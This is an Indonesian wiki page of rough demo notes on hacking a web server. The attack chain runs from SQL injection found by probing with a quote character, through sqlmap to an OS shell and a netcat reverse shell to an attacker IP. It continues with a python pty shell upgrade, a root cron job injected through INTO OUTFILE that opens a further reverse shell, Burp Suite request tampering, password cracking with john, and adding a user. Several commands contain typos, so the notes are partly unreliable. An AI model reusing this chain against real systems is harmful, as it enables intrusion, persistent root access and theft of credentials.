Onnowpurbo: New page: netdiscover SQL Injection - GET - HOST GET index.php?id=1' kalau ada ERROR ada celah HOST username admin password " ERROR ada celah SQL injection Attack sqlmap -u "url-yangadaerror" --...

2013-11-16T02:57:35Z

New page: netdiscover SQL Injection - GET - HOST GET index.php?id=1' kalau ada ERROR ada celah HOST username admin password " ERROR ada celah SQL injection Attack sqlmap -u "url-yangadaerror" --...

New page

netdiscover

SQL Injection
- GET
- HOST

GET
index.php?id=1'
kalau ada ERROR ada celah

HOST
username admin
password "
ERROR ada celah SQL injection

Attack
sqlmap -u "url-yangadaerror" --data="POSTDATA=diambildaritemperdata" --batch -v 3 -level=6 --risk=5
sqlmap -u "url-yangadaerror" --data="POSTDATA=diambildaritemperdata" --batch -v 0 lakukanremoteshell

OS-shell> id, ls

OS=shell> whereis mc
OS-shell> /bin/nc.traditional ipattacker 9999 =e /bin/sh

di komuter attacker
nc -lvvp 9999

dapat session
id

pyhton -c 'impprt pty;pty.spwwan("/bin/bash/")'

exploit

./john

pakai burpsuite port 8080 di localhost
intercept off

authentikasi ulang dengan password yang salah

burpsuite dapat cookies & session
200 normal
300 direct
400 error / forbidden
i

* * * * * root /bin/nc.traditional ipattacker 5555 -e /bin/sh --- ini utk memerinatahkan root exekusi nc

nmap localhost --- check apakah port sudah di buka

pakai burpsuite pakai Decoder >EDivafe AS ASCII HEX
copy ASCII HEX masukan ke

pakai burpsuite pakai repeater
myusername=admin &mypassword=" 1=1 union elect 0x20,0x20 INTO OUTFILE * * * * * rootdst --&Submit=Login

check id di OS Shell nc id dapat password root

useradd domas
adduser
passwd

Hacking: Orek-Orekan Demo Hacking - Revision history

Onnowpurbo: New page: netdiscover SQL Injection - GET - HOST GET index.php?id=1' kalau ada ERROR ada celah HOST username admin password " ERROR ada celah SQL injection Attack sqlmap -u "url-yangadaerror" --...